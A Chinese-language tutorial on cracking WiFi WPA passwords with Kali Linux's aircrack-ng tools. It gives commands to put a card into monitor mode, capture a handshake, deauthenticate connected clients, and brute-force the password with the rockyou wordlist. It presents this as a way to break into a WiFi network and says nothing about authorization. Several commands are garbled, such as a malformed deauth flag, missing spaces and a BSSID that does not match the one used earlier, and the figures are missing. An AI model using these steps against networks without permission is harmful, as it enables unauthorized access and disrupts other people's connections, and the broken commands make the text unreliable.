kali linux破解WiFi教程

kali是黑客最常用的系统，其包含众多黑客工具，方便使用。

这里默认已经安装好了kali系统。

破解WiFi是kali比较简单的一个操作，破解WiFi最重要的是要有一个好的字典，我以Kali Linux自带的rockyou字典为例，位于/user/share/wordlists/rockyou.txt.gz。

使用前先解压：

# gzip -d /usr/share/wordlists/rockyou.txt.gz

废话不多说，教程开始。

1.查看网卡是否支持监听模式。

在终端输入：airmon-ng

（1）

上面列出了支持监听模式的无线网卡，可以看到wlan0支持监听模式

2.开启监听模式。

在终端输入：airmon-ng start wlan0

（3）

执行成功之后网卡接口变为wlan0mon；可以使用ifconfig命令查看。

3.查看WiFi网络。

在终端输入：airodump-ng wlan0mon

此时，会列出了周围的wifi和它们的详细信息，包括信号强度、加密类型、频道等。记住要破解wifi的频道号和BSSID。按Ctrl-C结束。

4.抓取握手包。

开始抓包：airodump-ng -c6 --bssidBC:46:99:66:F9:84 -w ~/ wlan0mon

参数解释：

-c指定频道号

–bssid指定路由器bssid

-w指定抓取的数据包保存位置

注意此处的空格。

（3）

5.强制连接到wifi的设备重新连接路由器

经过步骤4，我们需要等用户连接/重连接wifi，才能抓到包，此时，就可能需要很长时间，因为并比一定一定有新用户连接此WiFi，所以，我们需要迫使用户连接WiFi。kali中有一个叫aireplay-ng的工具，它可以强制用户断开wifi连接；原理是，给连接到wifi的一个设备发送一个deauth（反认证）包，让那个设备断开wifi，随后它自然会再次连接wifi。

但是，aireplay-ng的生效前提是，wifi网络中至少有一个连接的设备。从上图(3)可以看到哪些设备连接到了wifi，STATION就是连接设备的MAC地址，记住一个。

打开新终端执行：aireplay-ng -02 -a 46:99:66:F9:84 -c B8:E8:56:09:CC:9C wlan0mon

参数解释：

-0表示发起deauthentication攻击

-a指定无线路由器BSSID

-c指定强制断开的设备

注意此处代码空格。

（4）

如果成功，会如下图。

（5）

按Ctrl-C结束抓包。

我们已经得到了想要的握手包了，可以结束无线网卡的监控模式了：

(6)

6.开始破解密码。

在终端输入：aircrack-ng- a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt~/*.cap

参数解释：

-a2代表WPA的握手包

-b指定要破解的wifi BSSID。

-w指定字典文件

-最后是抓取的包。

然后就是等待了，可能几分钟，也可能几个小时，这就根据电脑性能和密码的复杂程度了。如果不成功，可百度其他字典，再破解。

（7）